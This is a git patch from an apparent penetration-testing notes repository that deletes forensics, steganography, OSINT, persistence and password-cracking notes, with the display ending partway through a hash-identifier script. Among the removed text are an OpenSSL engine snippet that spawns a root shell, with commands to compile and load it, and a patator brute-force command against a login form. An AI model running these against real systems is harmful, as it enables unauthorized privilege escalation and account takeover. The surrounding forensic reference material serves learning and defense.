From cfa5f355b7306ee4d5aa920c42fcba1d6e336daa Mon Sep 17 00:00:00 2001 
From: whx Date: Sat, 12 Nov 2022 23:24:23 +0100 Subject: [PATCH] restructured osint --- .gitmodules | 27 - crypto/openssl/OpenSSL-Cheatsheet.md | 23 - crypto/openssl/openssl_engine.md | 44 -- crypto/rsa.md | 36 -- forensics/ios.md | 32 - forensics/kape.md | 23 - forensics/ntfs.md | 48 -- forensics/oletools.md | 28 - forensics/volatility | 1 - forensics/volatility.md | 91 --- forensics/volatility3 | 1 - forensics/windows_registry.md | 119 ---- hashes/bruteforce/patator | 1 - hashes/bruteforce/patator.md | 23 - hashes/exrex | 1 - hashes/generate_wordlists.md | 48 -- hashes/haiti.md | 6 - hashes/hash-id.py | 592 ------------------ hashes/hash_cracker.py | 20 - hashes/hashcat_utils.md | 24 - hashes/namely | 1 - hashes/password_cracking/colabcat | 1 - hashes/password_cracking/hydra.md | 37 -- hashes/password_cracking/john.md | 43 -- hashes/password_cracking/smb_challenge.md | 19 - hashes/password_cracking/sucrack.md | 8 - hashes/password_cracking/vnc.md | 6 - .../password_guessing/standard_passwords.md | 9 - hashes/wordlistctl | 1 - osint/LeetLinked | 1 - osint/osint_links.txt | 9 - osint/recon_ng.md | 4 - osint/social_engineering/gophish.md | 12 - osint/social_engineering/phishing_domain.md | 5 - osint/spiderfoot.md | 8 - osint/theharvester.md | 4 - persistence/bashrc.md | 8 - persistence/crontab.md | 15 - persistence/meterpreter.md | 6 - persistence/persistence.md | 323 ---------- persistence/wmi.md | 3 - reverse engineering/SCDBG | 1 - reverse engineering/android/misc.md | 81 --- reverse engineering/docs/deobfuscation.md | 97 --- reverse engineering/docs/dll_reversing.md | 9 - reverse engineering/docs/firmware.md | 35 -- reverse engineering/docs/function_mangling.md | 4 - reverse engineering/docs/scada.md | 35 -- reverse engineering/java/krakatau.md | 17 - .../windows/portable-executable.md | 33 - stego/docs/outguess.md | 2 - stego/docs/remnux.md | 24 - stego/docs/stegbrute.md | 9 - stego/docs/steghide.md | 8 - stego/docs/stegoveritas.md | 3 - stego/docs/zsteg.md | 8 
- stego/stego-toolkit | 1 - stego/xor_key_file.py | 15 - 58 files changed, 2093 deletions(-) delete mode 100644 crypto/openssl/OpenSSL-Cheatsheet.md delete mode 100644 crypto/openssl/openssl_engine.md delete mode 100644 crypto/rsa.md delete mode 100644 forensics/ios.md delete mode 100644 forensics/kape.md delete mode 100644 forensics/ntfs.md delete mode 100644 forensics/oletools.md delete mode 160000 forensics/volatility delete mode 100644 forensics/volatility.md delete mode 160000 forensics/volatility3 delete mode 100644 forensics/windows_registry.md delete mode 160000 hashes/bruteforce/patator delete mode 100644 hashes/bruteforce/patator.md delete mode 160000 hashes/exrex delete mode 100644 hashes/generate_wordlists.md delete mode 100644 hashes/haiti.md delete mode 100644 hashes/hash-id.py delete mode 100755 hashes/hash_cracker.py delete mode 100644 hashes/hashcat_utils.md delete mode 160000 hashes/namely delete mode 160000 hashes/password_cracking/colabcat delete mode 100644 hashes/password_cracking/hydra.md delete mode 100644 hashes/password_cracking/john.md delete mode 100644 hashes/password_cracking/smb_challenge.md delete mode 100644 hashes/password_cracking/sucrack.md delete mode 100644 hashes/password_cracking/vnc.md delete mode 100644 hashes/password_guessing/standard_passwords.md delete mode 160000 hashes/wordlistctl delete mode 160000 osint/LeetLinked delete mode 100644 osint/osint_links.txt delete mode 100644 osint/recon_ng.md delete mode 100644 osint/social_engineering/gophish.md delete mode 100644 osint/social_engineering/phishing_domain.md delete mode 100644 osint/spiderfoot.md delete mode 100644 osint/theharvester.md delete mode 100644 persistence/bashrc.md delete mode 100644 persistence/crontab.md delete mode 100644 persistence/meterpreter.md delete mode 100644 persistence/persistence.md delete mode 100644 persistence/wmi.md delete mode 160000 reverse engineering/SCDBG delete mode 100644 reverse engineering/android/misc.md delete mode 100644 
reverse engineering/docs/deobfuscation.md delete mode 100644 reverse engineering/docs/dll_reversing.md delete mode 100644 reverse engineering/docs/firmware.md delete mode 100644 reverse engineering/docs/function_mangling.md delete mode 100644 reverse engineering/docs/scada.md delete mode 100644 reverse engineering/java/krakatau.md delete mode 100644 reverse engineering/windows/portable-executable.md delete mode 100644 stego/docs/outguess.md delete mode 100644 stego/docs/remnux.md delete mode 100644 stego/docs/stegbrute.md delete mode 100644 stego/docs/steghide.md delete mode 100644 stego/docs/stegoveritas.md delete mode 100644 stego/docs/zsteg.md delete mode 160000 stego/stego-toolkit delete mode 100644 stego/xor_key_file.py
diff --git a/.gitmodules b/.gitmodules
index cb6af2e..409e0c9 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -58,24 +58,12 @@
 [submodule "misc/PowerSploit"]
 path = misc/PowerSploit
 url = https://github.com/PowerShellMafia/PowerSploit.git
-[submodule "hashes/wordlistctl"]
- path = hashes/wordlistctl
- url = https://github.com/BlackArch/wordlistctl.git
-[submodule "forensics/volatility3"]
- path = forensics/volatility3
- url = https://github.com/volatilityfoundation/volatility3.git
-[submodule "forensics/volatility"]
- path = forensics/volatility
- url = https://github.com/volatilityfoundation/volatility.git
 [submodule "exploit/web/content_security_policy/JSONBee"]
 path = exploit/web/content_security_policy/JSONBee
 url = https://github.com/zigoo0/JSONBee.git
 [submodule "post_exploitation/firefox_decrypt"]
 path = post_exploitation/firefox_decrypt
 url = https://github.com/unode/firefox_decrypt.git
-[submodule "hashes/password_cracking/colabcat"]
- path = hashes/password_cracking/colabcat
- url = https://github.com/someshkar/colabcat.git
 [submodule "reverse_shells/php-reverse-shell"]
 path = reverse_shells/php-reverse-shell
 url = https://github.com/ivan-sincek/php-reverse-shell.git
@@ -133,9 +121,6 @@
 [submodule "misc/static-binaries"]
 path = misc/static-binaries
 url = https://github.com/andrew-d/static-binaries.git
-[submodule "stego/stego-toolkit"]
- path = stego/stego-toolkit
- url = https://github.com/DominicBreuker/stego-toolkit.git
 [submodule "exploit/windows/printspoofer"]
 path = exploit/windows/printspoofer
 url = https://github.com/dievus/printspoofer.git
@@ -160,9 +145,6 @@
 [submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
 path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
 url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
-[submodule "hashes/exrex"]
- path = hashes/exrex
- url = https://github.com/asciimoo/exrex.git
 [submodule "exploit/padding/PadBuster"]
 path = exploit/padding/PadBuster
 url = https://github.com/AonCyberLabs/PadBuster.git
@@ -172,12 +154,6 @@
 [submodule "post_exploitation/bc_security/Empire"]
 path = post_exploitation/bc_security/Empire
 url = https://github.com/BC-SECURITY/Empire.git
-[submodule "osint/LeetLinked"]
- path = osint/LeetLinked
- url = https://github.com/Sq00ky/LeetLinked.git
-[submodule "hashes/namely"]
- path = hashes/namely
- url = https://github.com/OrielOrielOriel/namely
 [submodule "misc/level3_hypervisor/kubeletctl"]
 path = misc/level3_hypervisor/kubeletctl
 url = https://github.com/cyberark/kubeletctl.git
@@ -247,6 +223,3 @@
 [submodule "exploit/level3_hypervisor/kubeletctl"]
 path = exploit/level3_hypervisor/kubeletctl
 url = https://github.com/cyberark/kubeletctl.git
-[submodule "hashes/bruteforce/patator"]
- path = hashes/bruteforce/patator
- url = https://github.com/lanjelot/patator.git
diff --git a/crypto/openssl/OpenSSL-Cheatsheet.md b/crypto/openssl/OpenSSL-Cheatsheet.md
deleted file mode 100644
index 964d99b..0000000
--- a/crypto/openssl/OpenSSL-Cheatsheet.md
+++ /dev/null
@@ -1,23 +0,0 @@ -# OpenSSL Cheatsheet - -## Extract keys from PFX Cert - -* Key and cert form PFX -```sh -openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes -openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys -``` - -## Extract & Repack PFX Cert - -* Extract & Repack with another password, e.g. from `mimikatz` to `cqure` -```sh -openssl pkcs12 -in *.pfx -out temp.pem -nodes -openssl pkcs12 -export -out *.pfx -in temp.pem -``` - -## Generate Certificate - -```sh -openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes -``` diff --git a/crypto/openssl/openssl_engine.md b/crypto/openssl/openssl_engine.md deleted file mode 100644 index 98363d9..0000000 --- a/crypto/openssl/openssl_engine.md +++ /dev/null @@ -1,44 +0,0 @@ -# OpenSSL Engine - -* Hook external libs -* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/) - -* Most minimal example -```C -#include - -static int bind(ENGINE *e, const char *id) -{ - return 1; -} - -IMPLEMENT_DYNAMIC_BIND_FN(bind) -IMPLEMENT_DYNAMIC_CHECK_FN() -``` - -* Shell as root -```C -#include -#include - -static int bind(ENGINE *e, const char *id) -{ - setuid(0); - setgid(0); - system("/bin/bash"); -} - -IMPLEMENT_DYNAMIC_BIND_FN(bind) -IMPLEMENT_DYNAMIC_CHECK_FN() -``` - -* Compile -```C -gcc -fPIC -o rootshell.o -c rootshell.c -gcc -shared -o rootshell.so -c -lcrytpo rootshell.o -``` - -* Execute via -```sh -openssl engine -t `pwd`/rootshell.so -``` diff --git a/crypto/rsa.md b/crypto/rsa.md deleted file mode 100644 index 66c4f5d..0000000 --- a/crypto/rsa.md +++ /dev/null 
@@ -1,36 +0,0 @@ -# RSA - -* `p * q = n` -* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html) -* \\(1 < $\phi$ < n \\) -* There is also $\phi$ = (p-1) * (q-1) - -* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\) -```python -possible_e = [] -for i in range (2, phi): - if gcd(n, i) == 1 and gcd(phi, i) == 1: - possible_e.append() -``` - -* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\) -```python -possible_d = [] -for i in range (phi + 1, phi + foo): - if i * e mod phi == 1 : - possible_d.append() -``` -* \\( Cipher = msg ** d mod $\phi$ \\) -* \\( Cleartext = cipher ** e mod $\phi$ ) - -## Euklid -```python -def gcd(a, b): - if b == 0: - return a - return gcd(b, a % b) -``` - -## Links - -* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html) diff --git a/forensics/ios.md b/forensics/ios.md deleted file mode 100644 index 642ba92..0000000 --- a/forensics/ios.md +++ /dev/null @@ -1,32 +0,0 @@ -# iOS Devices - -## Trust Certificates -* Exchanged between 'Trusted' devices and the charging iOS device. -* iTunes access to the iOS device has elevated permissions using the cert. -* Keychain may be extracted through iTunes. - -## Interesting Files -* `ResetCounter.plist`, hard Reset diagnostic counter -* `com.apple.preferences.datetime.plist` -* DB tables - * Atendee - * Task - * Event -* Mail -* Safari -* Cookies -* Pictures -* Addressbook -* SMS -* Voicemail -* WiFi Keys - -## Backups -Encrypted and unencrypted backups can be chosen in the iTunes menu. - - -## Tools -* [iFunbox](https://www.i-funbox.com/en/page-about-us.html) -* [O.MG cable](https://shop.hak5.org/products/o-mg-cable) - - 
diff --git a/forensics/kape.md b/forensics/kape.md deleted file mode 100644 index d79bf8c..0000000 --- a/forensics/kape.md +++ /dev/null @@ -1,23 +0,0 @@ -# Kroll Artifact Parser - -* Collect and processes artifacts on windows -* Collects from live systems, mounted images and F-response tool - -## Targets - -* Needs source and target directory, as well as a module to process the files on -* `Target` copies a file into a repository -* `*.tkape` files contains metadata of the files to copy -* `Compound Targets` contain metadata of multiple files in order to get a result quicker -* `!Disable` do not appear in the target list -* `!Local` keep on local - - -## Modules - -* Used on the targeted files -* `*.mkape` files -* Additional binaries are kept in `bin` - - - diff --git a/forensics/ntfs.md b/forensics/ntfs.md deleted file mode 100644 index 6ef15ce..0000000 --- a/forensics/ntfs.md +++ /dev/null @@ -1,48 +0,0 @@ -# NTFS - -* Has the following advantages over FAT - * Journaling - * ACL - * Volume Shadow Copy - * Alternate Data Stream - -## Master File Table -* VBR references to `$MFT` -* `$LOGFILE` stores transactions of the file system -* `$UsnJrnl` changed files, and reason for change - -## Caching - -* File information is cached for frequent use in -```sh -C:\Windows\Prefetch\*.pf -``` -* An SQLite database can be found under -```sh -C:\Users\\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db -``` - -## Jumplist - -* Stores recently used files of applications inside the taskbar -```sh -C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations -``` - -## Shortcut Files -```sh -C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\ -C:\Users\\AppData\Roaming\Microsoft\Office\Recent\ -``` - -## Internet Explorer History -```sh -C:\Users\\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat -``` - -## Removeable Device Setup Log -```sh -C:\Windows\inf\setupapi.dev.log -``` - - 
diff --git a/forensics/oletools.md b/forensics/oletools.md
deleted file mode 100644
index 251843e..0000000
--- a/forensics/oletools.md
+++ /dev/null
@@ -1,28 +0,0 @@
-# oletools & Vmonkey
-
-* Analyze ooxml and ole2 files
-
-* [oletools repo](https://github.com/decalage2/oletools.git)
-
-## Usage
-
-* Check content of a stream
-```sh
-oledump.py file.doc -Ss
-oledump.py file.doc -Ss -v
-```
-```sh
-oledump.py -i file.doc
-```
-```sh
-olevba file.doc
-```
-
-## Vipermonkey
-* For the lazy ones
-```sh
-vmonkey file.doc
-```
-
-## scdbg
-* [scdbg repo](https://github.com/dzzie/SCDBG.git)
diff --git a/forensics/volatility b/forensics/volatility
deleted file mode 160000
index a438e76..0000000
--- a/forensics/volatility
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit a438e768194a9e05eb4d9ee9338b881c0fa25937
diff --git a/forensics/volatility.md b/forensics/volatility.md
deleted file mode 100644
index 3809f95..0000000
--- a/forensics/volatility.md
+++ /dev/null
@@ -1,91 +0,0 @@ -# Volatility - -Search through collected volatile memory dumps, volume and VM images. -Volatility and Volatility 3 have a different syntax. The older one has -higher malware hunting abilities. - -* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf) -* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples) -* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables) - -## Basic Commands - -* Basic Info, find OS profile -```sh -volatility -f imageinfo -volatility -f kdbgscan -``` -* Process list -```sh -volatility -f --profile pslist -``` -* List dlls -```sh -volatility -f --profile dlllist -p -``` -* Last accessed dir -```sh -volatility -f --profile shellbags -``` - -### Volatility3 - -* Basic Info works too, but you have to know the kind of OS anyway -```sh -volatility -f windows.info -``` - -* Process list, but processes can be hidden. Therefore use ` psscan ` -```sh -volatility -f windows.pslist -volatility -f windows.psscan -volatility -f windows.pstree -``` - -* List dlls, this includes the path of the file -```sh -volatility -f windows.dlllist -``` - -* Find malicious files, fileless and including files, respectively -```sh -volatility -f windows.malfind -volatility -f windows.vadyarascan -``` - -* Dump memory map -```sh -volatility -f windows.memmap.Memmap --pid --dump -``` - -* Dump and scan files -```sh -windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory -windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files. -``` - -* Find file handles or mutex -```sh -volatility -f windows.mutex -``` - -* Malware hunting through hooking -```sh -windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table -windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image. 
-windows.modules.Modules Lists the loaded kernel modules. -windows.driverscan.DriverScan Scans for drivers present in a particular windows -``` - - -## Plugins - -Volatility 3 plugins are named after the specific profile they are used for. -For the most part these are (` macOS.*, windows.*, linux.* `) - -* For example - * Truecryptpassphrase - * cmdscan, command history - * shutdowntime - - diff --git a/forensics/volatility3 b/forensics/volatility3 deleted file mode 160000 index f821ac6..0000000 --- a/forensics/volatility3 +++ /dev/null @@ -1 +0,0 @@ -Subproject commit f821ac60721047dd7b8832724b28e1383903199c diff --git a/forensics/windows_registry.md b/forensics/windows_registry.md deleted file mode 100644 index 7e141f7..0000000 --- a/forensics/windows_registry.md +++ /dev/null 
@@ -1,119 +0,0 @@ -# Windows Registry - -## Regedit Keys -* HKEY_CURRENT_USER (HKCU), inside HKU -* HKEY_USERS (HKU) -* HKEY_LOCAL_MACHINE (HKLM) -* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU - * `HKEY_CURREN_USER\Software\Classes` for settings of interactive user - * `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings -* HKEY_CURRENT_CONFIG - -## Paths -* `C:\Windows\System32\Config` - * Default -> `HKEY_USERS\DEFAULT` - * SAM -> `HKEY_LOCAL_MACHINE\SAM` - * SECURITY -> `HKEY_LOCAL_MACHINE\Security` - * SOFTWARE -> `HKEY_LOCAL_MACHINE\Software` - * SYSTEM -> `HKEY_LOCAL_MACHINE\System` - -* `C:\Users\\` - * NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file -* `C:\Users\\AppData\Local\Microsoft\Windows` - * USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file - -* `C:\Windows\AppCompat\Programs\Amcache.hve` - -### Transaction Logs -* Transaction `.LOG` of the registry hive -* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered. 
- -### Backups -* Saved every ten days -* Look out for recently deleted or modified keys -* `C:\Windows\System32\Config\RegBack` - -## Data Acquisition -* Tools - * [Autopsy](https://www.autopsy.com/) - * [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve` - * [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree - * `Registry Viewer` - * `Zimmerman's Registry Explorer`, uses transaction logs as well - * ` AppCompatCache Parser` - * `RegRipper`, cli and gui - -## System Information -* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion` -* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName` -* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation` -* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces` -* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` -* Services -> `SYSTEM\CurrentControlSet\Services` - * Service will start at boot with `start` key value `0x02` -* Users, SAM -> `SAM\Domains\Account\Users` - - -### Control Sets -* `ControlSet001` -> last boot -* `ControlSet002` -> last known good -* `HKLM\SYSTEM\CurrentControlSet` -> live - -* Can be found under: - * `SYSTEM\Select\Current` shows the used control set - * `SYSTEM\Select\LastKnownGood` - -## Autostart Programs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run` -* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` - -## Recent Files -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. 
xml, pdf, jpg -* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word` -* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU` - -## ShellBags -* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags` -* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` - -## Last Open/Saved/Visited Dialog MRUs -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU` - -## Explorer Address/Search Bars -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths` -* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery` - -## User Assist -* GUI applications launched by the user -* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count` - -## Shim Cache -* Application Compatibility, AppCompatCache -* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache` -* Use `AppCompatCacheParser.exe --csv -f -c ` - -### AmCache -* Information about recently run applications on the system -* `C:\Windows\appcompat\Programs\Amcache.hve` -* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\` -* Saves SHA1 of the last executed app - -## Background Activity Monitor/Desktop Activity Moderator BAM/DAM -* Saves full path of executed apps -* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` -* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}` - -## Devices -* Identification - * USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB` -* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices` -* First time connected -> 
`SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064` -* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066` -* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067` - diff --git a/hashes/bruteforce/patator b/hashes/bruteforce/patator deleted file mode 160000 index 4690822..0000000 --- a/hashes/bruteforce/patator +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 46908228cc85fbc032426a12d048fa372e213da4 diff --git a/hashes/bruteforce/patator.md b/hashes/bruteforce/patator.md deleted file mode 100644 index ad1a363..0000000 --- a/hashes/bruteforce/patator.md +++ /dev/null @@ -1,23 +0,0 @@ -# Patator Bruteforcing - -* [Lanjelot's Repo](https://github.com/lanjelot/patator/) - -## Modules - -* Available modules can be found under `patator --help` -* Module specifics can be found via `patator -h` - -## Using a Module - -* For example `http_fuzz` can be used via -```sh -TARGET_IP=10.0.47.11 -CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2) -SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}') - -echo "The CSRF is: $CSRF" -echo "The PHPSESSID is: $SESSION_ID" - -patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x -``` - diff --git a/hashes/exrex b/hashes/exrex deleted file mode 160000 index 9a66706..0000000 --- a/hashes/exrex +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 9a66706e7582a9cf31c4121629c9035e329bbe21 
diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md deleted file mode 100644 index 40899ab..0000000 --- a/hashes/generate_wordlists.md +++ /dev/null @@ -1,48 +0,0 @@ -# Generate Wordlists - -* [username_generator](https://github.com/therodri2/username_generator.git) -* [CeWL](../enumeration/CeWL/README.md) -* [Mentalist](https://github.com/sc0tfree/mentalist.git) -* [lyricpass](https://github.com/initstring/lyricpass.git) -* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) - - -## Cupp - -* [cupp](https://github.com/Mebus/cupp.git) - * Interactive dialogue via `cupp.py -i` - * Wordlistdownload via `cupp.py -l` - * Connections to alecto DB via `-a` - -## crunch - -```sh -crunch -o -``` - -* Option `-t` specifies variable characters - * `@`, lower case alpha characters - * `,`, upper case alpha characters - * `%`, numeric characters - * `^`, special characters including space -```sh -crunch 8 8 -t passw%%rd -``` - -## ttpassgen -* [ttpassgen](https://github.com/tp7309/TTPassGen.git) -* Generate lists from the ground up -* `pip install ttpassgen` -```sh -ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt -``` -```sh -ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt -``` -```sh -ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt -``` - -# exrex - -* Generate all possible outcomes from regex string diff --git a/hashes/haiti.md b/hashes/haiti.md deleted file mode 100644 index 5af9a7d..0000000 --- a/hashes/haiti.md +++ /dev/null @@ -1,6 +0,0 @@ -# haiti - -* Hash Identifier -```sh -haiti -``` diff --git a/hashes/hash-id.py b/hashes/hash-id.py deleted file mode 100644 index 6efb601..0000000 --- a/hashes/hash-id.py +++ /dev/null 
@@ -1,592 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 -# Hash Identifier -# By Zion3R -# www.Blackploit.com -# Root@Blackploit.com - -from builtins import input -from sys import argv, exit - -version = 1.2 - -logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - -algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", 
"106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", 
